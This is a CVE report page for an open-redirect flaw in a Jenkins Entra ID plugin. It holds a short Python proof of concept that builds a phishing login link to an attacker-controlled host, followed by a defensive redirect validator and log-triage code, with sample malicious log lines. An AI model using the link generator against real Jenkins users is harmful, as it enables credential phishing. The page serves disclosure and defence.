Security Vulnerability Report
CVE-2026-42525 CVSS 4.3 MEDIUM

Published: 2026-04-29 14:16:20
Last Modified: 2026-05-05 14:25:15

Description

Jenkins Microsoft Entra ID (previously Azure AD) Plugin 666.v6060de32f87d and earlier does not restrict the redirect URL after login (an open redirect, CWE-601), allowing attackers to perform phishing attacks. Per the CVSS vector, no privileges are required but the victim must follow an attacker-supplied link and complete the login; the only rated impact is to integrity (the post-login destination), not to confidentiality or availability.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jenkins:azure_ad:*:*:*:*:*:jenkins:*:* - VULNERABLE
Jenkins Microsoft Entra ID Plugin 666.v6060de32f87d and earlier

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-42525: Open Redirect in Jenkins Microsoft Entra ID Plugin
# This script demonstrates how an attacker can craft a malicious URL to redirect users.
import urllib.parse


def generate_malicious_url(jenkins_base_url, malicious_target):
    """
    Generates a malicious URL exploiting the open redirect vulnerability.
    Note: The specific parameter name might vary based on plugin configuration,
    commonly 'from', 'redirect', or 'redirectUri' in Jenkins flows.
    """
    # Endpoint handling the login redirection
    # (assumed, as with the parameter name below; neither is confirmed by this page)
    login_endpoint = "/securityRealm/commenceLogin"
    # Constructing the payload
    params = {
        "from": malicious_target  # Vulnerable parameter
    }
    full_url = f"{jenkins_base_url}{login_endpoint}?{urllib.parse.urlencode(params)}"
    return full_url


if __name__ == "__main__":
    target = "http://jenkins.example.com"
    evil_site = "http://attacker-controlled-site.com/steal-credentials"
    exploit_url = generate_malicious_url(target, evil_site)
    print(f"[+] Malicious Link generated:\n{exploit_url}")
    print("\n[+] When a user clicks this link and logs in, they will be redirected to the evil site.")
```
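The PoC above only builds the link. The following Python is an added example, not code from the plugin or the Jenkins project: it shows the check a fixed login handler needs (a redirect-target validator that accepts only same-origin destinations, including the scheme-relative and backslash variants browsers normalise to `//`) and applies the same validator to constructed access-log lines to flag login requests that carried an off-site `from` value. The endpoint path `/securityRealm/commenceLogin`, the parameter name `from`, the host `jenkins.example.com` and the log format are assumptions carried over from the PoC, not facts this page confirms.

```python
"""Redirect-target validation and log triage for a post-login 'from' parameter (CWE-601).

Added example, not the Jenkins plugin's own code. It assumes the login endpoint takes
the return URL in a query parameter named 'from', as the PoC above does; confirm the
real endpoint and parameter name against the plugin source or the vendor advisory.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the Jenkins instance's own public URL (assumed).
JENKINS_URL = "https://jenkins.example.com/"

# Constructed sample access-log lines in combined format (assumed layout, not real data).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [29/Apr/2026:14:16:20 +0000] "GET /securityRealm/commenceLogin'
    '?from=%2Fjob%2Fbuild-api%2F HTTP/1.1" 302 0',
    '10.0.0.9 - - [29/Apr/2026:14:17:02 +0000] "GET /securityRealm/commenceLogin'
    '?from=http%3A%2F%2Fattacker-controlled-site.com%2Fsteal-credentials HTTP/1.1" 302 0',
    '10.0.0.9 - - [29/Apr/2026:14:17:40 +0000] "GET /securityRealm/commenceLogin'
    '?from=%2F%5Cattacker-controlled-site.com HTTP/1.1" 302 0',
    '10.0.0.7 - - [29/Apr/2026:14:18:11 +0000] "GET /job/build-api/ HTTP/1.1" 200 4096',
]


def is_safe_redirect(target: str, jenkins_url: str = JENKINS_URL) -> bool:
    """Return True only if `target` stays on this Jenkins instance.

    Accepts: a relative path beginning with exactly one '/' (e.g. '/job/x/'), or an
             absolute URL whose scheme and host:port match `jenkins_url` exactly.
    Rejects: other hosts, scheme-relative '//evil', backslash forms such as '/\\evil'
             (browsers treat '\\' as '/'), non-matching schemes (javascript:, http:
             when the instance is https:), userinfo tricks ('https://good@evil/'),
             empty values and anything containing control characters.
    """
    if not target or any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return False
    # Normalise backslashes first: browsers do, urlsplit does not.
    candidate = target.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme == "" and parts.netloc == "":
        # Relative path: one leading slash, never '//' (which would be a new authority).
        return candidate.startswith("/") and not candidate.startswith("//")
    base = urlsplit(jenkins_url)
    return (parts.scheme.lower() == base.scheme.lower()
            and parts.netloc.lower() == base.netloc.lower())


def find_unsafe_login_redirects(access_log_lines, jenkins_url: str = JENKINS_URL):
    """Scan access-log lines for login requests whose 'from' value points off-site.

    Returns a list of (line_number, decoded_target) for each unsafe value found.
    parse_qs percent-decodes once, which is what the server-side framework would see.
    """
    hits = []
    for n, line in enumerate(access_log_lines, 1):
        try:
            request = line.split('"')[1]   # 'GET /path?query HTTP/1.1'
            request_uri = request.split()[1]
        except IndexError:
            continue                        # malformed line, skip it
        uri = urlsplit(request_uri)
        if not uri.path.endswith("/securityRealm/commenceLogin"):
            continue
        for target in parse_qs(uri.query).get("from", []):
            if not is_safe_redirect(target, jenkins_url):
                hits.append((n, target))
    return hits


if __name__ == "__main__":
    for line_no, target in find_unsafe_login_redirects(SAMPLE_ACCESS_LOG):
        print(f"line {line_no}: off-site post-login redirect to {target!r}")
```

The validator is deliberately strict: it rejects scheme changes (`http://` when the instance is `https://`) and paths without a leading slash rather than trying to repair them, because a redirect target that does not already look like one the application itself generated has no legitimate reason to be accepted. Running the module prints the two constructed log lines whose `from` value leaves the instance; the relative `/job/build-api/` request is not reported.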

References

https://www.jenkins.io/security/advisory/2026-04-29/#SECURITY-3760 (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-42525", "sourceIdentifier": "[email protected]", "published": "2026-04-29T14:16:19.557", "lastModified": "2026-05-05T14:25:14.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins Microsoft Entra ID (previously Azure AD) Plugin 666.v6060de32f87d and earlier does not restrict the redirect URL after login, allowing attackers to perform phishing attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:azure_ad:*:*:*:*:*:jenkins:*:*", "versionEndIncluding": "666.v6060de32f87d", "matchCriteriaId": "E9C13250-934D-47A2-B273-F7F5D604507D"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2026-04-29/#SECURITY-3760", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```